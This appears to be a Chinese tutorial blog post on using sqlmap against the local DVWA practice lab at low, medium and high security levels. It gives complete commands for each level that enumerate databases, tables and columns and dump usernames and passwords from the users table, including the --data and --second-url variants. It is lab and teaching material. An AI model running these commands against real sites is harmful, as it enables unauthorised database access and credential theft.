当前位置: 首页 > wzjs >正文

课程网站建设目标任务免费代理招商网

课程网站建设目标任务,免费代理招商网,设计平台建设,上海网站公司本文章仅用于学习,禁止用于其他 文章目录 前言一、sqlmap工具(kali自带)二、DVWA靶场三种模式下sqlmap使用Low级别爆库爆表爆字段爆密码 medium爆库爆表爆字段爆密码 high爆库爆表爆字段爆密码 总结 前言 SQL注入(SQL Injection&…

本文章仅用于学习,禁止用于其他

文章目录

  • 前言
  • 一、sqlmap工具(kali自带)
  • 二、DVWA靶场三种模式下sqlmap使用
    • Low级别
      • 爆库
      • 爆表
      • 爆字段
      • 爆密码
    • medium
      • 爆库
      • 爆表
      • 爆字段
      • 爆密码
    • high
      • 爆库
      • 爆表
      • 爆字段
      • 爆密码
  • 总结


前言

SQL注入(SQL Injection,简称SQLi)是一种常见的网络安全攻击手段。攻击者通过在Web应用程序的输入字段(如表单输入框、URL参数等)中注入恶意的SQL代码,从而欺骗数据库执行这些非预期的指令。这种攻击通常发生在应用程序对用户输入的数据未进行充分验证和过滤的情况下


一、sqlmap工具(kali自带)

所需环境:burpsuite,python2.7.18,pikachu,sqlmap1.5,phpstudy7以下

sqlmap1.9需配置python3.6以上环境

kali上只需要安装好burpsuite就行

二、DVWA靶场三种模式下sqlmap使用

Low级别

爆库

python sqlmap的环境安装路径\sqlmap.py -u "http://127.0.0.1/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#"  --cookie="security=low; PHPSESSID=fpghhenonb58lv7b5gfsgajk87" --batch  --current-db

这里–cookie值抓包查看
在这里插入图片描述
–batch --current-db爆数据库
在这里插入图片描述

kali版

sqlmap -u "http://127.0.0.1/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#"  --cookie="security=low; PHPSESSID=fpghhenonb58lv7b5gfsgajk87" --batch  --current-db

爆表

python sqlmap的环境安装路径\sqlmap.py -u "http://127.0.0.1/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#"  --cookie="security=low; PHPSESSID=u7kr4u786asmevlpqvg07nt8t2" --batch -D dvwa -tables

-D+数据库 -tables查表

kali版

sqlmap -u "http://127.0.0.1/01/vulnerabilities/sqli/?id=1&Submit=Submit#"  --cookie="security=low; PHPSESSID=fpghhenonb58lv7b5gfsgajk87" --batch -D dvwa -tables

爆字段

python sqlmap的环境安装路径\sqlmap.py -u "http://127.0.0.1/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#"  --cookie="security=low; PHPSESSID=u7kr4u786asmevlpqvg07nt8t2" --batch -D dvwa -columns

在这里插入图片描述

爆密码

python sqlmap的环境安装路径\sqlmap.py -u "http://127.0.0.1/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#"  --cookie="security=low; PHPSESSID=u7kr4u786asmevlpqvg07nt8t2" --batch -D dvwa -T users -C user,password -dump

-T+表 -C+查询密码和用户名 -dump打印
在这里插入图片描述

medium

Medium+ --data

爆库

python  sqlmap的环境安装路径\sqlmap.py -u "http://127.0.0.1/01/vulnerabilities/sqli/?"  --cookie="security=medium; PHPSESSID=fpghhenonb58lv7b5gfsgajk87" --data  "id=1&Submit=Submit" --current-db

在这里插入图片描述

爆表

python  sqlmap的环境安装路径\sqlmap.py -u "http://127.0.0.1/01/vulnerabilities/sqli/?"  --cookie="security=medium; PHPSESSID=fpghhenonb58lv7b5gfsgajk87" --data  "id=1&Submit=Submit" --batch -D dvwa -tables

在这里插入图片描述

爆字段

python  sqlmap的环境安装路径\sqlmap.py -u "http://127.0.0.1/01/vulnerabilities/sqli/?"  --cookie="security=medium; PHPSESSID=fpghhenonb58lv7b5gfsgajk87" --data  "id=1&Submit=Submit" --batch -D dvwa -columns

在这里插入图片描述

爆密码

python  sqlmap的环境安装路径\sqlmap.py -u "http://127.0.0.1/01/vulnerabilities/sqli/?"  --cookie="security=medium; PHPSESSID=fpghhenonb58lv7b5gfsgajk87" --data  "id=1&Submit=Submit" --batch -D dvwa -T users -C user,password -dump

在这里插入图片描述

high

high+ --second-url注入

爆库

python  sqlmap的环境安装路径\sqlmap.py -u "127.0.0.1/01/vulnerabilities/sqli/session-input.php#" --data "id=1&Submit=Submit" --cookie="id=1;security=high; PHPSESSID=1ndi0p1u3f7g535olfbotrjo80" --second-url "http://127.0.0.1/01/vulnerabilities/sqli/" --current-db

在这里插入图片描述

爆表

python  sqlmap的环境安装路径\sqlmap.py -u "127.0.0.1/01/vulnerabilities/sqli/session-input.php#" --data "id=1&Submit=Submit" --cookie="id=1;security=high; PHPSESSID=1ndi0p1u3f7g535olfbotrjo80" --second-url "http://127.0.0.1/01/vulnerabilities/sqli/" --batch -D dvwa -tables

在这里插入图片描述

爆字段

python  sqlmap的环境安装路径\sqlmap.py -u "127.0.0.1/01/vulnerabilities/sqli/session-input.php#" --data "id=1&Submit=Submit" --cookie="id=1;security=high; PHPSESSID=1ndi0p1u3f7g535olfbotrjo80" --second-url "http://127.0.0.1/01/vulnerabilities/sqli/" --batch -D dvwa -columns

在这里插入图片描述

爆密码

python  sqlmap的环境安装路径\sqlmap.py -u "127.0.0.1/01/vulnerabilities/sqli/session-input.php#" --data "id=1&Submit=Submit" --cookie="id=1;security=high; PHPSESSID=1ndi0p1u3f7g535olfbotrjo80" --second-url "http://127.0.0.1/01/vulnerabilities/sqli/" --batch -D dvwa -T users -C user,password -dump

在这里插入图片描述


总结

当应用程序将用户输入直接拼接到SQL查询语句中时,攻击者可以构造恶意输入,改变原本SQL语句的结构和逻辑,进而实现对数据库的非法操作。例如,攻击者可以通过SQL注入绕过身份验证、获取敏感信息(如用户密码、信用卡信息等)、篡改数据或执行其他恶意操作

http://www.dtcms.com/wzjs/831176.html

相关文章:

  • 美容网站建设一个多少钱c++后端开发需要学什么
  • 网站开发的接口文档网络信息科技有限公司
  • 小白如何搭建个人网站wordpress子目录无法访问后台
  • 上海房产交易网站益阳市网站建设科技
  • 东营建设信息网站建站网站如何清理缓存
  • 用python网站开发企信网企业信用信息系统
  • 营销型网站设计稿什么网站可以做数据调查问卷
  • html网站开发软件网站开发怎么做才有利于seo
  • 网络优化内容有哪些检测 网站优化
  • wordpress 代码插件长春百度网站排名优化
  • 别人给公司做的网站字体侵权吗揭阳专业网站制作公司
  • 个人网站建设方案书 学生网站建设教程搭建湖南岚鸿
  • 网站推广方法的费用客户管理系统的设计与实现
  • 中国空间网站做网站必须知道的问题
  • 公司做网站比较好的网络seo关键词优化技巧
  • 08网站建设t恤在线设计网站
  • html5网站建设加盟wordpress简单用户中心
  • 住房和城乡建设部标准定额司网站潍坊seo关键词排名
  • 网站里的课程配图怎么做五种网络营销推广方法
  • 网页建设与网站设计中山企业网站设计
  • 网站备案查询工信部官网1688阿里巴巴首页
  • 企业网站报价方案模板下载商标设计网站排行
  • 万江做网站的公司台州企业网站seo
  • 百度怎么制作网站教程电商网站数据中心建设方案
  • 做网站需要注意的动画设计招聘信息
  • 如何做网站定位中企网站建设
  • 长安做网站公司wordpress插件 投票
  • seo做得好的企业网站可以做音基题的音乐网站
  • 网站首页权重低上海搜索排名优化公司
  • 河北衡水市网站制作的公司深圳电子商城网站建设